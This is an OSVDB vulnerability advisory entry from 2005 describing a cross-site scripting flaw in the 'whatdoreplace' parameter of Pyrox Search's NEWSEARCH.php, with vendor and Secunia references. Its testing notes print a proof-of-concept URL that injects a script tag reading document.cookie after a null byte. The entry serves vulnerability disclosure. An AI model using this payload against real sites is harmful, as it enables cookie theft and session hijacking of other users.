Pyrox Search NEWSEARCH.php whatdoreplace Variable XSS

2005-07-21T08:26:57
ID OSVDB:18135
Type osvdb
Reporter OSVDB
Modified 2005-07-21T08:26:57

Description

Manual Testing Notes

http://[victim]/[path]/NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)</script>

References:

Vendor URL: http://freephp.html.it/script/view_script.asp?id=415
Secunia Advisory ID: 16154
Other Advisory URL: http://www.rgod.altervista.org/pyroxsearchpoc.txt